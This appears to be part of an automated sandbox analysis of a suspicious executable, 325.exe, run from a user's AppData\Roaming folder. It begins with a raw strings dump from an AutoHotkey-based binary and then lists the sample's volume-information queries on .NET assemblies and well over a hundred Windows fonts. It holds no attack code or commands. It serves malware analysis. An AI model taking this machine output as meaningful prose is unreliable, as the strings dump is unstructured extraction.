%-1.60s%s\:\:HKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264LineRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPClipboardAllComSpecFalseProgramFilesTrueAhkPathAhkVersionAppDataAppDataCommonBatchLinesCaretXCaretYComputerNameControlDelayCoordModeCaretCoordModeMenuCoordModeMouseCoordModePixelCoordModeToolTipCursorDDDDDDDDDDefaultGuiDefaultListViewDefaultMouseSpeedDefaultTreeViewDesktopDesktopCommonEndCharEventInfoExitReasonFormatFloatFormatIntegerGuiControlEventGuiEventGuiHeightGuiWidthGuiXGuiYHourIconFileIconHiddenIconNumberIconTipIndexIPAddress1IPAddress2IPAddress3IPAddress4Is64bitOSIsAdminIsCompiledIsCriticalIsPausedIsSuspendedIsUnicodeKeyDelayKeyDelayPlayKeyDurationKeyDurationPlayLanguageLastErrorLineFileLineNumberLoopFieldLoopFileAttribLoopFileDirLoopFileExtLoopFileFullPathLoopFileLongPathLoopFileNameLoopFileShortNameLoopFileShortPathLoopFileSizeLoopFileSizeKBLoopFileSizeMBLoopFileTimeAccessedLoopFileTimeCreatedLoopFileTimeModifiedLoopReadLineLoopRegKeyLoopRegNameLoopRegSubKeyLoopRegTimeModifiedLoopRegTypeMDayMinMMMMMMMMMMonMouseDelayMouseDelayPlayMSecMyDocumentsNowNowUTCNumBatchLinesOSTypeOSVersionPriorHotkeyPriorKeyProgramsProgramsCommonPtrSizeRegViewScreenDPIScreenHeightScreenWidthScriptDirScriptFullPathScriptHwndScriptNameSecStartMenuStartMenuCommonStartupStartupCommonStoreCapslockModeThisFuncThisHotkeyThisLabelThisMenuThisMenuItemThisMenuItemPosTickCountTimeIdleTimeIdlePhysicalTimeSincePriorHotkeyTimeSinceThisHotkeyTitleMatchModeTitleMatchModeSpeedUserNameWDayWinDelayWinDirWorkingDirYDayYearYWeekYYYYRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s

Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Users\user\AppData\Roaming\325.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
